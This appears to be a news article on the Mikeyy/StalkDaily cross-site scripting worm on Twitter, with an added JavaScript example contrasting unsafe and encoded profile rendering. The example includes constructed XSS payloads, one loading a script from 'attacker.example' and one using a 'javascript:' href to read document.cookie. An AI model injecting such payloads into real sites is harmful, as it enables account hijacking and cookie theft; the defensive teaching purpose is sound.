Just hours after Twitter began cleaning up the first cross-site scripting worm to hit its site this weekend, a modified strain has surfaced, and according to F-Secure it is not the last one we’re likely to see over the next few days.
“This is not over. There’s going to be quite a few modified Twitter worms for a day or two. Be careful in Twitter, don’t view profiles, don’t follow links. It’s beautiful outside, maybe go for a walk instead?” Mikko said on the F-Secure blog earlier today.
According to Breaking News, Mikeyy Mooney, the 17 year-old owner of StalkDaily.com, has reportedly admitted responsibility for yesterday’s attack.
“I am the person who coded the XSS which then acted as a worm when it auto updated a user’s profile and status, which then infected other users who viewed their profile. I did this out of boredom, to be honest. I usually like to find vulnerabilities within websites and try not to cause too much damage, but start a worm or something to give the developers an insight on the problem and while doing so, promoting myself or my website.”
We wrote about StalkDaily yesterday, and last night Twitter said on its status blog that it had “taken steps to remove the offending updates and to close the holes that allowed this ‘worm’ to spread.” The offending code is on GitHub, as Mr Speaker noted in our comments, and a postmortem of yesterday’s vulnerability is on the DCortesi blog.
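Mikeyy’s description (a script stored in a profile field that runs for anyone who views the profile) is the textbook stored XSS pattern: user-controlled text interpolated into a page without output encoding. The example below is added here as an illustration and is not the worm’s code from GitHub, Twitter’s fix, or anything from the postmortem. It uses a constructed profile object with assumed field names (`name`, `website`), constructed payloads and a made-up host (`attacker.example`), and shows the unescaped renderer beside one that applies context-aware HTML encoding plus a URL scheme check. It deliberately stops at the injection point; the self-propagation step (the injected script making an authenticated profile update for each viewer) is target-specific and not reproduced.

```javascript
// Added example, not code from the article, Twitter, or the StalkDaily worm.
// Profile field names, payloads and "attacker.example" are constructed for the demo.

// Vulnerable renderer: interpolates profile fields straight into markup.
// Whatever the user stored in "name" or "website" becomes part of the page.
function renderProfileUnsafe(profile) {
  return `<div class="profile">` +
    `<h1>${profile.name}</h1>` +
    `<a href="${profile.website}">${profile.website}</a>` +
    `</div>`;
}

// Output encoding for HTML text nodes and double-quoted attribute values.
// All five characters matter: "<" and ">" stop new tags, "&" stops entity
// smuggling, and both quote types stop attribute breakouts.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Escaping alone does not make a URL attribute safe: "javascript:alert(1)"
// contains nothing escapeHtml would touch, yet executes as an href.
// So the scheme is checked separately and only http(s) is allowed.
function safeUrl(value) {
  let parsed;
  try {
    parsed = new URL(String(value)); // throws on anything that is not an absolute URL
  } catch (e) {
    return '#';
  }
  return (parsed.protocol === 'http:' || parsed.protocol === 'https:') ? parsed.href : '#';
}

// Hardened renderer: same markup, every interpolation encoded for its context.
function renderProfileSafe(profile) {
  const url = safeUrl(profile.website);
  return `<div class="profile">` +
    `<h1>${escapeHtml(profile.name)}</h1>` +
    `<a href="${escapeHtml(url)}">${escapeHtml(url)}</a>` +
    `</div>`;
}

// Two constructed payloads of the kind a profile-field worm relies on:
// one closes the href attribute and drops in an external script element,
// the other injects an event handler in the text context plus a javascript: URL.
const WORM_PROFILE = {
  name: 'Mikeyy',
  website: '"><script src="//attacker.example/worm.js"></script><a href="',
};
const ATTR_PROFILE = {
  name: '<img src=x onerror="alert(1)">',
  website: 'javascript:alert(document.cookie)',
};

// Crude check used only to compare the two renderers: did a live tag or a
// javascript: href survive into the output? (Not a production XSS filter.)
function containsInjectedMarkup(html) {
  return /<(script|img)\b|href="javascript:/i.test(html);
}

console.log('unsafe, worm payload :', containsInjectedMarkup(renderProfileUnsafe(WORM_PROFILE)));
console.log('safe,   worm payload :', containsInjectedMarkup(renderProfileSafe(WORM_PROFILE)));
console.log('unsafe, attr payload :', containsInjectedMarkup(renderProfileUnsafe(ATTR_PROFILE)));
console.log('safe,   attr payload :', containsInjectedMarkup(renderProfileSafe(ATTR_PROFILE)));
```

The two fixes are not interchangeable: `escapeHtml` handles the text and attribute contexts, `safeUrl` handles the URL context, and removing the worm’s “offending updates” from the database does nothing for the next payload unless both are applied at render time.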
Clearly Mikeyy is still bored, as a new version is now making its way across the Twitterverse, tweeting comments such as: “Man, Twitter can’t fix shit. Mikeyy owns :)”
So if you see a tweet mentioning Mikeyy, don’t click its links and don’t view the poster’s profile: viewing an infected profile is what spreads it.
If you need to remove Mikeyy, Twittercism walks you through in six easy steps.
We’ll keep you updated as the day progresses.